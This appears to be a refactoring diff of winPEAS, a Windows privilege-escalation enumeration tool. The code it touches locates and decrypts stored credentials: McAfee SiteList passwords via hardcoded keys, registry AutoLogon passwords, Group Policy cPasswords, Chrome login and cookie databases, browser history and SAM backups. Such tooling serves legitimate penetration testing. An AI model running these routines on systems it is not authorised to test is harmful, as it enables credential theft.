-            SearchHelper.RootDirCurrentUser = SearchHelper.GetFilesFast(rootCurrentUserSearchPath, GlobalPattern, isFoldersIncluded: true);
+            RootDirCurrentUser = GetFilesFast(rootCurrentUserSearchPath, GlobalPattern, isFoldersIncluded: true);
 
             // c:\Program Files\
             string rootProgramFiles = $"{SystemDrive}\\Program Files\\";
-            SearchHelper.ProgramFiles = SearchHelper.GetFilesFast(rootProgramFiles, GlobalPattern, isFoldersIncluded: true);
+            ProgramFiles = GetFilesFast(rootProgramFiles, GlobalPattern, isFoldersIncluded: true);
 
             // c:\Program Files (x86)\
             string rootProgramFilesX86 = $"{SystemDrive}\\Program Files (x86)\\";
-            SearchHelper.ProgramFilesX86 = SearchHelper.GetFilesFast(rootProgramFilesX86, GlobalPattern, isFoldersIncluded: true);
+            ProgramFilesX86 = GetFilesFast(rootProgramFilesX86, GlobalPattern, isFoldersIncluded: true);
 
             // c:\Documents and Settings\
             string documentsAndSettings = $"{SystemDrive}\\Documents and Settings\\";
-            SearchHelper.DocumentsAndSettings = SearchHelper.GetFilesFast(documentsAndSettings, GlobalPattern, isFoldersIncluded: true);
+            DocumentsAndSettings = GetFilesFast(documentsAndSettings, GlobalPattern, isFoldersIncluded: true);
 
             // c:\ProgramData\Microsoft\Group Policy\History
             string groupPolicyHistory = $"{SystemDrive}\\ProgramData\\Microsoft\\Group Policy\\History";
-            SearchHelper.GroupPolicyHistory = SearchHelper.GetFilesFast(groupPolicyHistory, GlobalPattern, isFoldersIncluded: true);
+            GroupPolicyHistory = GetFilesFast(groupPolicyHistory, GlobalPattern, isFoldersIncluded: true);
 
             // c:\Documents and Settings\All Users\Application Data\\Microsoft\\Group Policy\\History
             string groupPolicyHistoryLegacy = $"{documentsAndSettings}\\All Users\\Application Data\\Microsoft\\Group Policy\\History";
             //SearchHelper.GroupPolicyHistoryLegacy = SearchHelper.GetFilesFast(groupPolicyHistoryLegacy, globalPattern);
-            var groupPolicyHistoryLegacyFiles = SearchHelper.GetFilesFast(groupPolicyHistoryLegacy, GlobalPattern, isFoldersIncluded: true);
+            var groupPolicyHistoryLegacyFiles = GetFilesFast(groupPolicyHistoryLegacy, GlobalPattern, isFoldersIncluded: true);
-            SearchHelper.GroupPolicyHistory.AddRange(groupPolicyHistoryLegacyFiles);
+            GroupPolicyHistory.AddRange(groupPolicyHistoryLegacyFiles);
         }
 
         internal static void CleanLists()
         {
-            SearchHelper.RootDirUsers = null;
+            RootDirUsers = null;
-            SearchHelper.RootDirCurrentUser = null;
+            RootDirCurrentUser = null;
-            SearchHelper.ProgramFiles = null;
+            ProgramFiles = null;
-            SearchHelper.ProgramFilesX86 = null;
+            ProgramFilesX86 = null;
-            SearchHelper.DocumentsAndSettings = null;
+            DocumentsAndSettings = null;
-            SearchHelper.GroupPolicyHistory = null;
+            GroupPolicyHistory = null;
 
             GC.Collect();
         }
@@ -258,7 +270,7 @@ namespace winPEAS.Helpers.Search
                 ".*password.*"
             };
 
-            foreach (var file in SearchHelper.RootDirUsers)
+            foreach (var file in RootDirUsers)
             {
                 //string extLower = file.Extension.ToLower();
 
@@ -285,7 +297,7 @@ namespace winPEAS.Helpers.Search
         {
             var result = new List<string>();
 
-            foreach (var file in SearchHelper.RootDirCurrentUser)
+            foreach (var file in RootDirCurrentUser)
             {
                 if (!file.IsDirectory)
                 {
@@ -325,7 +337,7 @@ namespace winPEAS.Helpers.Search
                 ".xml"
             };
 
-            foreach (var file in SearchHelper.GroupPolicyHistory)
+            foreach (var file in GroupPolicyHistory)
             {
                 if (!file.IsDirectory)
                 {
@@ -349,14 +361,14 @@ namespace winPEAS.Helpers.Search
             };
 
             string programDataPath = $"{SystemDrive}\\ProgramData\\";
-            var programData = SearchHelper.GetFilesFast(programDataPath, GlobalPattern);
+            var programData = GetFilesFast(programDataPath, GlobalPattern);
 
             var searchFiles = new List<CustomFileInfo>();
-            searchFiles.AddRange(SearchHelper.ProgramFiles);
+            searchFiles.AddRange(ProgramFiles);
-            searchFiles.AddRange(SearchHelper.ProgramFilesX86);
+            searchFiles.AddRange(ProgramFilesX86);
             searchFiles.AddRange(programData);
-            searchFiles.AddRange(SearchHelper.DocumentsAndSettings);
+            searchFiles.AddRange(DocumentsAndSettings);
-            searchFiles.AddRange(SearchHelper.RootDirUsers);
+            searchFiles.AddRange(RootDirUsers);
 
             foreach (var file in searchFiles)
             {
@@ -391,7 +403,7 @@ namespace winPEAS.Helpers.Search
                 ".pdf",
             };
 
-            foreach (var file in SearchHelper.RootDirCurrentUser)
+            foreach (var file in RootDirCurrentUser)
             {
                 if (!file.IsDirectory)
                 {
@@ -439,7 +451,7 @@ namespace winPEAS.Helpers.Search
                 ".pdf",
             };
 
-            foreach (var file in SearchHelper.RootDirUsers)
+            foreach (var file in RootDirUsers)
             {
                 if (!file.IsDirectory)
                 {

winPEAS/winPEASexe/winPEAS/Helpers/YamlConfig/YamlConfig.cs

@@ -8,7 +8,8 @@ namespace winPEAS.Helpers.YamlConfig
         {
             public string name { get; set; }
             public RegularExpression[] regexes { get; set; }
-            public class RegularExpression {
+            public class RegularExpression
+            {
                 public string name { get; set; }
                 public string regex { get; set; }
 

winPEAS/winPEASexe/winPEAS/Helpers/YamlConfig/YamlConfigHelper.cs

@@ -1,10 +1,9 @@
 using System.Collections.Generic;
-using System.Yaml.Serialization;
 using System.IO;
-using System.Reflection;
 using System.Linq;
+using System.Reflection;
+using System.Yaml.Serialization;
 using static winPEAS.Helpers.YamlConfig.YamlConfig;
-using static winPEAS.Helpers.YamlConfig.YamlRegexConfig;
 
 
 namespace winPEAS.Helpers.YamlConfig

winPEAS/winPEASexe/winPEAS/Info/ApplicationInfo/ApplicationInfoHelper.cs

@@ -1,6 +1,5 @@
 using System;
 using System.Collections.Generic;
-using System.Runtime.InteropServices;
 using System.Text;
 using winPEAS.Helpers;
 using winPEAS.Native;

winPEAS/winPEASexe/winPEAS/Info/ApplicationInfo/AutoRuns.cs

@@ -1,10 +1,10 @@
-using System;
+using Microsoft.Win32;
+using System;
 using System.Collections.Generic;
 using System.IO;
 using System.Linq;
 using System.Management;
 using System.Text.RegularExpressions;
-using Microsoft.Win32;
 using winPEAS.Helpers;
 using winPEAS.Helpers.Registry;
 
@@ -343,6 +343,8 @@ namespace winPEAS.Info.ApplicationInfo
             usersPath = Directory.GetParent(usersPath).FullName;
 
             try
+            {
+                if (Directory.Exists(usersPath))
                 {
                     var userDirs = Directory.EnumerateDirectories(usersPath);
 
@@ -356,6 +358,7 @@ namespace winPEAS.Info.ApplicationInfo
                         }
                     }
                 }
+            }
             catch (Exception)
             {
             }
@@ -363,6 +366,8 @@ namespace winPEAS.Info.ApplicationInfo
             foreach (string path in autorunLocations)
             {
                 try
+                {
+                    if (Directory.Exists(path))
                     {
                         var files = Directory.EnumerateFiles(path, "*", SearchOption.TopDirectoryOnly);
 
@@ -382,6 +387,7 @@ namespace winPEAS.Info.ApplicationInfo
                             });
                         }
                     }
+                }
                 catch (Exception)
                 {
                 }

winPEAS/winPEASexe/winPEAS/Info/ApplicationInfo/InstalledApps.cs

@@ -70,6 +70,8 @@ namespace winPEAS.Info.ApplicationInfo
         {
             var results = new SortedDictionary<string, Dictionary<string, string>>();
             try
+            {
+                if (Directory.Exists(fpath))
                 {
                     foreach (string f in Directory.EnumerateFiles(fpath))
                     {
@@ -83,6 +85,7 @@ namespace winPEAS.Info.ApplicationInfo
                         results[d] = PermissionsHelper.GetRecursivePrivs(d);
                     }
                 }
+            }
             catch (Exception ex)
             {
                 Beaprint.GrayPrint("Error: " + ex);

winPEAS/winPEASexe/winPEAS/Info/EventsInfo/ProcessCreation/ProcessCreation.cs

@@ -1,6 +1,5 @@
 using System.Collections.Generic;
 using winPEAS.Helpers;
-using winPEAS.Info.EventsInfo.PowerShell;
 
 namespace winPEAS.Info.EventsInfo.ProcessCreation
 {

winPEAS/winPEASexe/winPEAS/Info/FilesInfo/McAfee/McAfee.cs

@@ -127,7 +127,7 @@ namespace winPEAS.Info.FilesInfo.McAfee
             byte[] XORKey = { 0x12, 0x15, 0x0F, 0x10, 0x11, 0x1C, 0x1A, 0x06, 0x0A, 0x1F, 0x1B, 0x18, 0x17, 0x16, 0x05, 0x19 };
 
             // xor the input b64 string with the static XOR key
-            var passwordBytes = System.Convert.FromBase64String(base64password);
+            var passwordBytes = Convert.FromBase64String(base64password);
             for (var i = 0; i < passwordBytes.Length; i++)
             {
                 passwordBytes[i] = (byte)(passwordBytes[i] ^ XORKey[i % XORKey.Length]);
@@ -135,7 +135,8 @@ namespace winPEAS.Info.FilesInfo.McAfee
 
             SHA1 crypto = new SHA1CryptoServiceProvider();
 
-            var tDESKey = MyUtils.CombineArrays(crypto.ComputeHash(System.Text.Encoding.ASCII.GetBytes("<!@#$%^>")), new byte[] { 0x00, 0x00, 0x00, 0x00 });
+            //var tDESKey = MyUtils.CombineArrays(crypto.ComputeHash(System.Text.Encoding.ASCII.GetBytes("<!@#$%^>")), new byte[] { 0x00, 0x00, 0x00, 0x00 });
+            byte[] tDESKey = { 62, 241, 54, 184, 179, 59, 239, 188, 52, 38, 167, 181, 78, 196, 26, 55, 124, 211, 25, 155, 0, 0, 0, 0 };
 
             // set the options we need
             var tDESalg = new TripleDESCryptoServiceProvider();

winPEAS/winPEASexe/winPEAS/Info/FilesInfo/Office/Office.cs

@@ -1,9 +1,9 @@
-using System;
+using Microsoft.Win32;
+using System;
 using System.Collections.Generic;
 using System.Globalization;
 using System.Linq;
 using System.Text.RegularExpressions;
-using Microsoft.Win32;
 using winPEAS.Helpers;
 using winPEAS.Helpers.Registry;
 using winPEAS.Info.FilesInfo.Office.OneDrive;

winPEAS/winPEASexe/winPEAS/Info/NetworkInfo/Firewall.cs

@@ -1,6 +1,5 @@
 using System;
 using System.Collections.Generic;
-using System.Reflection;
 using System.Runtime.InteropServices;
 using winPEAS.Helpers;
 

winPEAS/winPEASexe/winPEAS/Info/ProcessInfo/ProcessesInfo.cs

@@ -6,7 +6,6 @@ using System.Linq;
 using System.Management;
 using System.Runtime.InteropServices;
 using System.Security.Principal;
-using System.Text;
 using System.Text.RegularExpressions;
 using System.Threading.Tasks;
 using winPEAS.Helpers;
@@ -33,7 +32,7 @@ namespace winPEAS.Info.ProcessInfo
                                     Proc = p,
                                     Pth = (string)mo["ExecutablePath"],
                                     CommLine = (string)mo["CommandLine"],
-                                    Owner = Helpers.HandlesHelper.GetProcU(p)["name"], //Needed inside the next foreach
+                                    Owner = HandlesHelper.GetProcU(p)["name"], //Needed inside the next foreach
                                 };
 
                     foreach (var itm in queRy)
@@ -54,14 +53,16 @@ namespace winPEAS.Info.ProcessInfo
                             }
                             if ((string.IsNullOrEmpty(companyName)) || (!Regex.IsMatch(companyName, @"^Microsoft.*", RegexOptions.IgnoreCase)))
                             {
-                                Dictionary<string, string> to_add = new Dictionary<string, string>();
+                                Dictionary<string, string> to_add = new Dictionary<string, string>
-                                to_add["Name"] = itm.Proc.ProcessName;
+                                {
-                                to_add["ProcessID"] = itm.Proc.Id.ToString();
+                                    ["Name"] = itm.Proc.ProcessName,
-                                to_add["ExecutablePath"] = itm.Pth;
+                                    ["ProcessID"] = itm.Proc.Id.ToString(),
-                                to_add["Product"] = companyName;
+                                    ["ExecutablePath"] = itm.Pth,
-                                to_add["Owner"] = itm.Owner == null ? "" : itm.Owner;
+                                    ["Product"] = companyName,
-                                to_add["isDotNet"] = isDotNet;
+                                    ["Owner"] = itm.Owner == null ? "" : itm.Owner,
-                                to_add["CommandLine"] = itm.CommLine;
+                                    ["isDotNet"] = isDotNet,
+                                    ["CommandLine"] = itm.CommLine
+                                };
                                 f_results.Add(to_add);
                             }
                         }
@@ -123,11 +124,13 @@ namespace winPEAS.Info.ProcessInfo
 
                         string hName = HandlesHelper.GetObjectName(dupHandle);
 
-                        Dictionary<string, string> to_add = new Dictionary<string, string>();
+                        Dictionary<string, string> to_add = new Dictionary<string, string>
-                        to_add["Handle Name"] = hName;
+                        {
-                        to_add["Handle"] = h.HandleValue.ToString() + "(" + typeName + ")";
+                            ["Handle Name"] = hName,
-                        to_add["Handle Owner"] = "Pid is " + h.UniqueProcessId.ToString() + "(" + origProcInfo.name + ") with owner: " + origProcInfo.userName;
+                            ["Handle"] = h.HandleValue.ToString() + "(" + typeName + ")",
-                        to_add["Reason"] = handlerExp.reason;
+                            ["Handle Owner"] = "Pid is " + h.UniqueProcessId.ToString() + "(" + origProcInfo.name + ") with owner: " + origProcInfo.userName,
+                            ["Reason"] = handlerExp.reason
+                        };
 
                         if (typeName == "process" || typeName == "thread")
                         {

winPEAS/winPEASexe/winPEAS/Info/ServicesInfo/ServicesInfoHelper.cs

@@ -1,4 +1,5 @@
-using System;
+using Microsoft.Win32;
+using System;
 using System.Collections.Generic;
 using System.Diagnostics;
 using System.Linq;
@@ -8,10 +9,8 @@ using System.Runtime.InteropServices;
 using System.Security.AccessControl;
 using System.ServiceProcess;
 using System.Text.RegularExpressions;
-using Microsoft.Win32;
 using winPEAS.Helpers;
 using winPEAS.Helpers.Registry;
-using winPEAS.KnownFileCreds;
 using winPEAS.Native;
 
 namespace winPEAS.Info.ServicesInfo
@@ -51,17 +50,18 @@ namespace winPEAS.Info.ServicesInfo
 
                                 if (string.IsNullOrEmpty(companyName) || (!Regex.IsMatch(companyName, @"^Microsoft.*", RegexOptions.IgnoreCase)))
                                 {
-                                    Dictionary<string, string> toadd = new Dictionary<string, string>();
+                                    Dictionary<string, string> toadd = new Dictionary<string, string>
-
+                                    {
-                                    toadd["Name"] = GetStringOrEmpty(result["Name"]);
+                                        ["Name"] = GetStringOrEmpty(result["Name"]),
-                                    toadd["DisplayName"] = GetStringOrEmpty(result["DisplayName"]);
+                                        ["DisplayName"] = GetStringOrEmpty(result["DisplayName"]),
-                                    toadd["CompanyName"] = companyName;
+                                        ["CompanyName"] = companyName,
-                                    toadd["State"] = GetStringOrEmpty(result["State"]);
+                                        ["State"] = GetStringOrEmpty(result["State"]),
-                                    toadd["StartMode"] = GetStringOrEmpty(result["StartMode"]);
+                                        ["StartMode"] = GetStringOrEmpty(result["StartMode"]),
-                                    toadd["PathName"] = GetStringOrEmpty(result["PathName"]);
+                                        ["PathName"] = GetStringOrEmpty(result["PathName"]),
-                                    toadd["FilteredPath"] = binaryPath;
+                                        ["FilteredPath"] = binaryPath,
-                                    toadd["isDotNet"] = isDotNet;
+                                        ["isDotNet"] = isDotNet,
-                                    toadd["Description"] = GetStringOrEmpty(result["Description"]);
+                                        ["Description"] = GetStringOrEmpty(result["Description"])
+                                    };
 
                                     results.Add(toadd);
                                 }

winPEAS/winPEASexe/winPEAS/Info/SystemInfo/GroupPolicy/GroupPolicy.cs

@@ -1,5 +1,5 @@
-using System.Collections.Generic;
+using Microsoft.Win32;
-using Microsoft.Win32;
+using System.Collections.Generic;
 using winPEAS.Helpers.Registry;
 using winPEAS.Native.Enums;
 

winPEAS/winPEASexe/winPEAS/Info/SystemInfo/NamedPipes/NamedPipes.cs

@@ -3,7 +3,6 @@ using System.IO;
 using System.Runtime.InteropServices;
 using System.Security.AccessControl;
 using winPEAS.Native;
-using System.Security.Principal;
 
 
 namespace winPEAS.Info.SystemInfo.NamedPipes
@@ -51,7 +50,7 @@ namespace winPEAS.Info.SystemInfo.NamedPipes
                 {
                     var security = File.GetAccessControl($"\\\\.\\pipe\\{namedPipe}");
                     sddl = security.GetSecurityDescriptorSddlForm(AccessControlSections.All);
-                    List<string> currentUserPermsList = winPEAS.Helpers.PermissionsHelper.GetMyPermissionsF(security, winPEAS.Checks.Checks.CurrentUserSiDs);
+                    List<string> currentUserPermsList = Helpers.PermissionsHelper.GetMyPermissionsF(security, Checks.Checks.CurrentUserSiDs);
                     currentUserPerms = string.Join(", ", currentUserPermsList);
                 }
                 catch

winPEAS/winPEASexe/winPEAS/Info/SystemInfo/SysMon/SysMon.cs

@@ -2,7 +2,6 @@
 using System;
 using System.Collections.Generic;
 using System.Diagnostics.Eventing.Reader;
-using System.Text.RegularExpressions;
 using winPEAS.Helpers;
 using winPEAS.Helpers.Registry;
 

winPEAS/winPEASexe/winPEAS/Info/SystemInfo/SystemInfo.cs

@@ -9,7 +9,6 @@ using System.Net.NetworkInformation;
 using System.Windows.Forms;
 using winPEAS.Helpers;
 using winPEAS.Helpers.Registry;
-using winPEAS.KnownFileCreds;
 
 namespace winPEAS.Info.SystemInfo
 {

winPEAS/winPEASexe/winPEAS/Info/SystemInfo/WindowsDefender/WindowsDefenderSettings.cs

@@ -1,7 +1,5 @@
 using System;
 using System.Collections.Generic;
-using Microsoft.Win32;
-using winPEAS.Helpers;
 using winPEAS.Helpers.Registry;
 
 namespace winPEAS.Info.SystemInfo.WindowsDefender

winPEAS/winPEASexe/winPEAS/Info/SystemInfo/WindowsDefender/WindowsDefenderSettingsInfo.cs

@@ -1,10 +1,4 @@
-using System;
+namespace winPEAS.Info.SystemInfo.WindowsDefender
-using System.Collections.Generic;
-using System.Linq;
-using System.Text;
-using System.Threading.Tasks;
-
-namespace winPEAS.Info.SystemInfo.WindowsDefender
 {
     class WindowsDefenderSettingsInfo
     {

winPEAS/winPEASexe/winPEAS/Info/UserInfo/SAM/SamServer.cs

@@ -2,7 +2,6 @@
 using System.Collections.Generic;
 using System.Runtime.InteropServices;
 using System.Security.Principal;
-using winPEAS.Helpers;
 using winPEAS.Native;
 using winPEAS.Native.Classes;
 

winPEAS/winPEASexe/winPEAS/Info/UserInfo/SID2GroupNameHelper.cs

@@ -2,7 +2,6 @@
 using System.Collections.Generic;
 using System.Net.NetworkInformation;
 using System.Security.Principal;
-using System.Text.RegularExpressions;
 using winPEAS.Helpers;
 
 namespace winPEAS.Info.UserInfo

winPEAS/winPEASexe/winPEAS/Info/UserInfo/Tenant/Tenant.cs

@@ -3,7 +3,6 @@ using System.Collections.Generic;
 using System.Runtime.InteropServices;
 using System.Security.Cryptography.X509Certificates;
 using System.Text;
-using winPEAS.Helpers;
 using winPEAS.Native;
 using winPEAS.Native.Structs;
 

winPEAS/winPEASexe/winPEAS/Info/UserInfo/User.cs

@@ -7,7 +7,6 @@ using System.Management;
 using System.Runtime.InteropServices;
 using System.Security.Principal;
 using winPEAS.Helpers;
-using winPEAS.KnownFileCreds;
 using winPEAS.Native;
 using winPEAS.Native.Structs;
 

winPEAS/winPEASexe/winPEAS/Info/UserInfo/UserInfoHelper.cs

@@ -6,7 +6,6 @@ using System.Windows.Forms;
 using winPEAS.Helpers;
 using winPEAS.Helpers.Registry;
 using winPEAS.Info.UserInfo.SAM;
-using winPEAS.KnownFileCreds;
 using winPEAS.Native;
 using winPEAS.Native.Enums;
 
@@ -251,14 +250,15 @@ namespace winPEAS.Info.UserInfo
 
         public static Dictionary<string, string> GetAutoLogon()
         {
-            Dictionary<string, string> results = new Dictionary<string, string>();
+            Dictionary<string, string> results = new Dictionary<string, string>
-
+            {
-            results["DefaultDomainName"] = RegistryHelper.GetRegValue("HKLM", "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", "DefaultDomainName");
+                ["DefaultDomainName"] = RegistryHelper.GetRegValue("HKLM", "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", "DefaultDomainName"),
-            results["DefaultUserName"] = RegistryHelper.GetRegValue("HKLM", "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", "DefaultUserName");
+                ["DefaultUserName"] = RegistryHelper.GetRegValue("HKLM", "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", "DefaultUserName"),
-            results["DefaultPassword"] = RegistryHelper.GetRegValue("HKLM", "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", "DefaultPassword");
+                ["DefaultPassword"] = RegistryHelper.GetRegValue("HKLM", "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", "DefaultPassword"),
-            results["AltDefaultDomainName"] = RegistryHelper.GetRegValue("HKLM", "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", "AltDefaultDomainName");
+                ["AltDefaultDomainName"] = RegistryHelper.GetRegValue("HKLM", "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", "AltDefaultDomainName"),
-            results["AltDefaultUserName"] = RegistryHelper.GetRegValue("HKLM", "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", "AltDefaultUserName");
+                ["AltDefaultUserName"] = RegistryHelper.GetRegValue("HKLM", "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", "AltDefaultUserName"),
-            results["AltDefaultPassword"] = RegistryHelper.GetRegValue("HKLM", "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", "AltDefaultPassword");
+                ["AltDefaultPassword"] = RegistryHelper.GetRegValue("HKLM", "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", "AltDefaultPassword")
+            };
             return results;
         }
 

winPEAS/winPEASexe/winPEAS/InterestingFiles/GPP.cs

@@ -15,7 +15,7 @@ namespace winPEAS.InterestingFiles
 
             try
             {
-                string allUsers = System.Environment.GetEnvironmentVariable("ALLUSERSPROFILE");
+                string allUsers = Environment.GetEnvironmentVariable("ALLUSERSPROFILE");
 
                 if (!allUsers.Contains("ProgramData"))
                 {
@@ -225,11 +225,13 @@ namespace winPEAS.InterestingFiles
                         Changed = "[BLANK]";
                     }
 
-                    results[file] = new Dictionary<string, string>();
+                    results[file] = new Dictionary<string, string>
-                    results[file]["UserName"] = UserName;
+                    {
-                    results[file]["NewName"] = NewName;
+                        ["UserName"] = UserName,
-                    results[file]["cPassword"] = cPassword;
+                        ["NewName"] = NewName,
-                    results[file]["Changed"] = Changed;
+                        ["cPassword"] = cPassword,
+                        ["Changed"] = Changed
+                    };
                 }
             }
             catch (Exception ex)

winPEAS/winPEASexe/winPEAS/InterestingFiles/InterestingFiles.cs

@@ -28,7 +28,7 @@ namespace winPEAS.InterestingFiles
                     $@"{systemRoot}\System32\config\RegBack\SYSTEM",
                 };
 
-                results.AddRange(searchLocations.Where(searchLocation => System.IO.File.Exists(searchLocation)));
+                results.AddRange(searchLocations.Where(searchLocation => File.Exists(searchLocation)));
             }
             catch (Exception ex)
             {
@@ -102,7 +102,7 @@ namespace winPEAS.InterestingFiles
                 // Reference: https://stackoverflow.com/questions/18071412/list-filenames-in-the-recyclebin-with-c-sharp-without-using-any-external-files
                 int lastDays = 30;
 
-                var startTime = System.DateTime.Now.AddDays(-lastDays);
+                var startTime = DateTime.Now.AddDays(-lastDays);
 
                 // Shell COM object GUID
                 Type shell = Type.GetTypeFromCLSID(new Guid("13709620-C279-11CE-A49E-444553540000"));

winPEAS/winPEASexe/winPEAS/InterestingFiles/Unattended.cs

@@ -40,7 +40,7 @@ namespace winPEAS.InterestingFiles
 
             try
             {
-                var winDir = System.Environment.GetEnvironmentVariable("windir");
+                var winDir = Environment.GetEnvironmentVariable("windir");
                 string[] searchLocations =
                 {
                     $"{winDir}\\sysprep\\sysprep.xml",
@@ -56,7 +56,7 @@ namespace winPEAS.InterestingFiles
                     $"{winDir}\\..\\unattend.inf",
                 };
 
-                results.AddRange(searchLocations.Where(System.IO.File.Exists));
+                results.AddRange(searchLocations.Where(File.Exists));
             }
             catch (Exception ex)
             {

winPEAS/winPEASexe/winPEAS/KnownFileCreds/Browsers/Chrome/Chrome.cs

@@ -1,6 +1,7 @@
 using System;
 using System.Collections.Generic;
 using System.IO;
+using System.Linq;
 using System.Text.RegularExpressions;
 using System.Web.Script.Serialization;
 using winPEAS.Checks;
@@ -27,7 +28,7 @@ namespace winPEAS.KnownFileCreds.Browsers.Chrome
             {
                 Beaprint.MainPrint("Looking for Chrome DBs");
                 Beaprint.LinkPrint("https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#browsers-history");
-                Dictionary<string, string> chromeDBs = Chrome.GetChromeDbs();
+                Dictionary<string, string> chromeDBs = GetChromeDbs();
 
                 if (chromeDBs.ContainsKey("userChromeCookiesPath"))
                 {
@@ -59,7 +60,7 @@ namespace winPEAS.KnownFileCreds.Browsers.Chrome
             {
                 Beaprint.MainPrint("Looking for GET credentials in Chrome history");
                 Beaprint.LinkPrint("https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#browsers-history");
-                Dictionary<string, List<string>> chromeHistBook = Chrome.GetChromeHistBook();
+                Dictionary<string, List<string>> chromeHistBook = GetChromeHistBook();
                 List<string> history = chromeHistBook["history"];
                 List<string> bookmarks = chromeHistBook["bookmarks"];
 
@@ -77,8 +78,11 @@ namespace winPEAS.KnownFileCreds.Browsers.Chrome
                             Beaprint.AnsiPrint("    " + url, colorsB);
                         }
                     }
-
                     Console.WriteLine();
+
+                    int limit = 50;
+                    Beaprint.MainPrint($"Chrome history -- limit {limit}\n");
+                    Beaprint.ListPrint(history.Take(limit).ToList());
                 }
                 else
                 {
@@ -130,14 +134,14 @@ namespace winPEAS.KnownFileCreds.Browsers.Chrome
                 else
                 {
                     string userChromeCookiesPath =
-                        $"{System.Environment.GetEnvironmentVariable("USERPROFILE")}\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies";
+                        $"{Environment.GetEnvironmentVariable("USERPROFILE")}\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies";
                     if (File.Exists(userChromeCookiesPath))
                     {
                         results["userChromeCookiesPath"] = userChromeCookiesPath;
                     }
 
                     string userChromeLoginDataPath =
-                        $"{System.Environment.GetEnvironmentVariable("USERPROFILE")}\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data";
+                        $"{Environment.GetEnvironmentVariable("USERPROFILE")}\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data";
                     if (File.Exists(userChromeLoginDataPath))
                     {
                         results["userChromeLoginDataPath"] = userChromeLoginDataPath;
@@ -156,7 +160,7 @@ namespace winPEAS.KnownFileCreds.Browsers.Chrome
             List<string> results = new List<string>();
 
             // parses a Chrome history file via regex
-            if (System.IO.File.Exists(path))
+            if (File.Exists(path))
             {
                 Regex historyRegex = new Regex(@"(http|ftp|https|file)://([\w_-]+(?:(?:\.[\w_-]+)+))([\w.,@?^=%&:/~+#-]*[\w@?^=%&/~+#-])?");
 
@@ -217,10 +221,10 @@ namespace winPEAS.KnownFileCreds.Browsers.Chrome
                 }
                 else
                 {
-                    string userChromeHistoryPath = string.Format("{0}\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History", System.Environment.GetEnvironmentVariable("USERPROFILE"));
+                    string userChromeHistoryPath = string.Format("{0}\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History", Environment.GetEnvironmentVariable("USERPROFILE"));
                     results["history"] = ParseChromeHistory(userChromeHistoryPath);
 
-                    string userChromeBookmarkPath = string.Format("{0}\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Bookmarks", System.Environment.GetEnvironmentVariable("USERPROFILE"));
+                    string userChromeBookmarkPath = string.Format("{0}\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Bookmarks", Environment.GetEnvironmentVariable("USERPROFILE"));
 
                     results["bookmarks"] = ParseChromeBookmarks(userChromeBookmarkPath);
                 }
@@ -241,7 +245,7 @@ namespace winPEAS.KnownFileCreds.Browsers.Chrome
             {
                 try
                 {
-                    string contents = System.IO.File.ReadAllText(path);
+                    string contents = File.ReadAllText(path);
 
                     // reference: http://www.tomasvera.com/programming/using-javascriptserializer-to-parse-json-objects/
                     JavaScriptSerializer json = new JavaScriptSerializer();

winPEAS/winPEASexe/winPEAS/KnownFileCreds/Browsers/Firefox/FFLogins.cs

@@ -1,10 +1,4 @@
-using System;
+namespace winPEAS.KnownFileCreds.Browsers.Firefox
-using System.Collections.Generic;
-using System.Linq;
-using System.Text;
-using System.Threading.Tasks;
-
-namespace winPEAS.KnownFileCreds.Browsers.Firefox
 {
     class FFLogins
     {

winPEAS/winPEASexe/winPEAS/KnownFileCreds/Browsers/Firefox/Firefox.cs

@@ -4,11 +4,11 @@ using System.Data;
 using System.IO;
 using System.Linq;
 using System.Text.RegularExpressions;
+using System.Web.Script.Serialization;
+using winPEAS._3rdParty.SQLite;
 using winPEAS.Checks;
 using winPEAS.Helpers;
 using winPEAS.KnownFileCreds.Browsers.Models;
-using winPEAS._3rdParty.SQLite;
-using System.Web.Script.Serialization;
 
 namespace winPEAS.KnownFileCreds.Browsers.Firefox
 {
@@ -29,7 +29,7 @@ namespace winPEAS.KnownFileCreds.Browsers.Firefox
             {
                 Beaprint.MainPrint("Looking for Firefox DBs");
                 Beaprint.LinkPrint("https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#browsers-history");
-                List<string> firefoxDBs = Firefox.GetFirefoxDbs();
+                List<string> firefoxDBs = GetFirefoxDbs();
                 if (firefoxDBs.Count > 0)
                 {
                     foreach (string firefoxDB in firefoxDBs) //No Beaprints because line needs red
@@ -56,21 +56,26 @@ namespace winPEAS.KnownFileCreds.Browsers.Firefox
             {
                 Beaprint.MainPrint("Looking for GET credentials in Firefox history");
                 Beaprint.LinkPrint("https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#browsers-history");
-                List<string> firefoxHist = Firefox.GetFirefoxHistory();
+                List<string> history = GetFirefoxHistory();
-                if (firefoxHist.Count > 0)
+                if (history.Count > 0)
                 {
                     Dictionary<string, string> colorsB = new Dictionary<string, string>()
                     {
                         { Globals.PrintCredStrings, Beaprint.ansi_color_bad },
                     };
 
-                    foreach (string url in firefoxHist)
+                    foreach (string url in history)
                     {
                         if (MyUtils.ContainsAnyRegex(url.ToUpper(), Browser.CredStringsRegex))
                         {
                             Beaprint.AnsiPrint("    " + url, colorsB);
                         }
                     }
+                    Console.WriteLine();
+
